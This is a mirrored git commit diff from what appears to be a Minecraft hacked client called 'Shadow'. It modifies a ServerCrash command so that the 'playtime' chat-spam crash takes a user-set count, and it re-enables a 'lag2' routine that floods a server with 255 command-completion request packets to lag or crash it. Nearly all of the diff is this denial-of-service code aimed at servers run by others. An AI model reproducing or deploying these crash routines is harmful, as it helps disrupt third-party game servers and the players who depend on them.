mirror of
https://github.com/Miasmusa/Shadow.git
synced 2024-11-15 03:14:54 -05:00
fcghvv
This commit is contained in:
parent
027d336566
commit
71f2f47286
2 changed files with 10 additions and 9 deletions
|
@ -130,8 +130,9 @@ public class ServerCrash extends Command {
|
||||||
}
|
}
|
||||||
|
|
||||||
case "playtime" -> {
|
case "playtime" -> {
|
||||||
for (int i = 0; i < 10; i++) {
|
int size = new IntegerArgumentParser().parse(args[1]);
|
||||||
client.player.sendChatMessage("/playtime " + rndStr(12));
|
for (int i = 0; i < size; i++) {
|
||||||
|
client.player.sendChatMessage("/playtime " + rndStr(1));
|
||||||
}
|
}
|
||||||
Notification.create(2000, "Server Crash", Notification.Type.SUCCESS, "Sent Playtime Crash");
|
Notification.create(2000, "Server Crash", Notification.Type.SUCCESS, "Sent Playtime Crash");
|
||||||
}
|
}
|
||||||
|
@ -150,12 +151,12 @@ public class ServerCrash extends Command {
|
||||||
Notification.create(2000, "Server Crash", Notification.Type.SUCCESS, "Sent Quick Lag Crash");
|
Notification.create(2000, "Server Crash", Notification.Type.SUCCESS, "Sent Quick Lag Crash");
|
||||||
}
|
}
|
||||||
|
|
||||||
//case "lag2" -> {
|
case "lag2" -> {
|
||||||
// for(int i = 0; i < 255; i++){
|
for(int i = 0; i < 255; i++){
|
||||||
// client.player.networkHandler.sendPacket(new RequestCommandCompletionsC2SPacket(0, "/"));
|
client.player.networkHandler.sendPacket(new RequestCommandCompletionsC2SPacket(0, "/"));
|
||||||
// }
|
}
|
||||||
// Notification.create(2000, "Server Crash", Notification.Type.SUCCESS, "Sent Quick Lag Crash");
|
Notification.create(2000, "Server Crash", Notification.Type.SUCCESS, "Sent Quick Lag Crash");
|
||||||
//}
|
}
|
||||||
|
|
||||||
case "maptool" -> {
|
case "maptool" -> {
|
||||||
int size = new IntegerArgumentParser().parse(args[1]);
|
int size = new IntegerArgumentParser().parse(args[1]);
|
||||||
|
|
|
@ -8,6 +8,7 @@ import io.netty.channel.ChannelHandlerContext;
|
||||||
import net.minecraft.network.ClientConnection;
|
import net.minecraft.network.ClientConnection;
|
||||||
import net.minecraft.network.Packet;
|
import net.minecraft.network.Packet;
|
||||||
import net.minecraft.network.listener.PacketListener;
|
import net.minecraft.network.listener.PacketListener;
|
||||||
|
import net.minecraft.network.packet.c2s.play.ClickSlotC2SPacket;
|
||||||
import net.shadow.client.feature.module.ModuleRegistry;
|
import net.shadow.client.feature.module.ModuleRegistry;
|
||||||
import net.shadow.client.feature.module.impl.misc.AntiPacketKick;
|
import net.shadow.client.feature.module.impl.misc.AntiPacketKick;
|
||||||
import net.shadow.client.helper.event.EventType;
|
import net.shadow.client.helper.event.EventType;
|
||||||
|
@ -20,7 +21,6 @@ import org.spongepowered.asm.mixin.injection.callback.CallbackInfo;
|
||||||
|
|
||||||
@Mixin(ClientConnection.class)
|
@Mixin(ClientConnection.class)
|
||||||
public class ClientConnectionMixin {
|
public class ClientConnectionMixin {
|
||||||
|
|
||||||
@Inject(method = "handlePacket", at = @At("HEAD"), cancellable = true)
|
@Inject(method = "handlePacket", at = @At("HEAD"), cancellable = true)
|
||||||
private static <T extends PacketListener> void dispatchPacketGet(Packet<T> packet, PacketListener listener, CallbackInfo ci) {
|
private static <T extends PacketListener> void dispatchPacketGet(Packet<T> packet, PacketListener listener, CallbackInfo ci) {
|
||||||
if (Events.fireEvent(EventType.PACKET_RECEIVE, new PacketEvent(packet))) {
|
if (Events.fireEvent(EventType.PACKET_RECEIVE, new PacketEvent(packet))) {
|
||||||
|
|
Loading…
Reference in a new issue